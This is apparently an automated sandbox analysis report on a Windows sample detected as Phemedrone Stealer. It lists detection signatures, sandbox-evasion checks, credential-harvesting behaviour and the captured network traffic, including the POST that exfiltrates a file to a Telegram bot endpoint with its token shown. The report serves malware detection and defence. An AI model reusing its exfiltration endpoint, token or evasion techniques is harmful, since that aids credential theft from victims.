
Windows Analysis Report
Ls4O6Pmixd.exe

Overview

General Information

Sample name: Ls4O6Pmixd.exe (renamed because the original name is a hash value)
Original sample name: 16e8183843e73d742ee2f2d334b8c6c0.exe
Analysis ID: 1576577
MD5: 16e8183843e73d742ee2f2d334b8c6c0
SHA1: 5167fa0c1f5771e2a24aab9c25633e81bbdae157
SHA256: 02d192483999e1acbe80fa6ee612b56d8768033a6018c9a5b95199943c82e683
Tags: exe, user-abuse_ch

Detection

Phemedrone Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Generic Stealer
Yara detected Phemedrone Stealer
AI detected suspicious sample
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • Ls4O6Pmixd.exe (PID: 5200 cmdline: "C:\Users\user\Desktop\Ls4O6Pmixd.exe" MD5: 16E8183843E73D742EE2F2D334B8C6C0)
  • cleanup
No configs have been found
Source | Rule | Description | Author
00000004.00000002.1424388835.00000000028C2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security
00000004.00000002.1424388835.0000000002790000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security
00000004.00000002.1424388835.00000000028BE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security
00000004.00000002.1424388835.0000000002588000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security
00000004.00000002.1424388835.0000000002588000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GenericStealer_9 | Yara detected Generic Stealer | Joe Security
            No Sigma rule has matched
            No Suricata rule has matched

            AV Detection

Source: Ls4O6Pmixd.exe | Avira: detected
Source: Ls4O6Pmixd.exe | Virustotal: Detection: 41%
Source: Ls4O6Pmixd.exe | ReversingLabs: Detection: 57%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Ls4O6Pmixd.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00007FFAAC5431E0 CryptUnprotectData, 4_2_00007FFAAC5431E0
Source: unknown | HTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.7:49701 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: Ls4O6Pmixd.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected:
    GET /v1/ip/geo.json HTTP/1.1
    Host: get.geojs.io
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.26.0.100
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected:
    POST /bot7604180600:AAHwr2u1ZveiHzQQ_yVoPYP2QNFw1punco0/sendDocument HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
    Content-Type: multipart/form-data; boundary=----------------------------8dd1e4d34176457
    Host: api.telegram.org
    Content-Length: 733555
    Expect: 100-continue
    Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.7:49701 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET /v1/ip/geo.json HTTP/1.1
    Host: get.geojs.io
    Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: get.geojs.io
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected:
    POST /bot7604180600:AAHwr2u1ZveiHzQQ_yVoPYP2QNFw1punco0/sendDocument HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
    Content-Type: multipart/form-data; boundary=----------------------------8dd1e4d34176457
    Host: api.telegram.org
    Content-Length: 733555
    Expect: 100-continue
    Connection: Keep-Alive
Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002613000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000026BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://get.geojs.io
Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000025A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000024CC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000025A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002613000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.tele
Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002613000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002613000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000024CC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7604180600:AAHwr2u1ZveiHzQQ_yVoPYP2QNFw1punco0/sendDocument(United
Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002613000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7604180600:AAHwr2u1ZveiHzQQ_yVoPYP2QNFw1punco0/sendDocument0
Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000024CC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://get.geojs.io
Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000024CC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://get.geojs.io/v1/ip/geo.json
Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000024CC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/
Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002588000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000027B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/TheDyer
Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000024CC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/freakcodingspot
Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002588000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000027B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/webster480
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49708 version: TLS 1.2

            System Summary

Source: Ls4O6Pmixd.exe | Static PE information: section name: .:"%
Source: Ls4O6Pmixd.exe | Static PE information: section name: .W!:
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00007FFAAC536E48 NtUnmapViewOfSection, 4_2_00007FFAAC536E48
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00007FFAAC53706D NtOpenFile, 4_2_00007FFAAC53706D
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00007FFAAC5369E4 NtClose, 4_2_00007FFAAC5369E4
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00007FFAAC536AC8 NtProtectVirtualMemory, 4_2_00007FFAAC536AC8
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00007FFAAC536BF9 NtAllocateVirtualMemory, 4_2_00007FFAAC536BF9
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00007FFAAC537599 NtQueryVolumeInformationFile, 4_2_00007FFAAC537599
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00007FFAAC5376A8 NtDeviceIoControlFile, 4_2_00007FFAAC5376A8
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00007FFAAC5371B1 NtCreateSection, 4_2_00007FFAAC5371B1
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00007FFAAC537410 NtMapViewOfSection, 4_2_00007FFAAC537410
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00007FFAAC5376A8: NtDeviceIoControlFile, 4_2_00007FFAAC5376A8
Source: Ls4O6Pmixd.exe, 00000004.00000000.1270543407.000000000015A000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamesystem.exeH vs Ls4O6Pmixd.exe
Source: Ls4O6Pmixd.exe | Binary or memory string: OriginalFilenamesystem.exeH vs Ls4O6Pmixd.exe
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/1@2/2
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Ls4O6Pmixd.exe.log
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Mutant created: \Sessions\1\BaseNamedObjects\Orajagohavurucutabimixoxatitova
Source: Ls4O6Pmixd.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 860
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6892
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3012
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4300
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3868
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2572
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3432
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 412
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5340
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4288
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5148
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6008
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3852
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2584
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6436
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4460
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3848
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5140
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3840
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6424
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6852
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5124
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2536
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3828
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1668
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2960
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2096
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2524
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2356
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6400
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2948
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 360
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6392
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 356
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5092
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1212
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 780
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5520
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6580
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1636
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 772
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5512
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3784
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5076
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4644
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4212
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5932
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 328
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1188
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2912
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 748
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1608
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6348
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6340
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4184
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5476
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5900
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6328
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5896
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3308
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2876
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2444
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2868
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6744
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4248
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 704
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2424
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1992
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5436
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2416
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6292
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2412
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5428
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4132
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1976
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6988
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3696
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4548
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 912
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1096
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4972
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4540
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1952
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1520
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4492
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1080
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5820
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6680
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2796
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5380
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6672
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5668
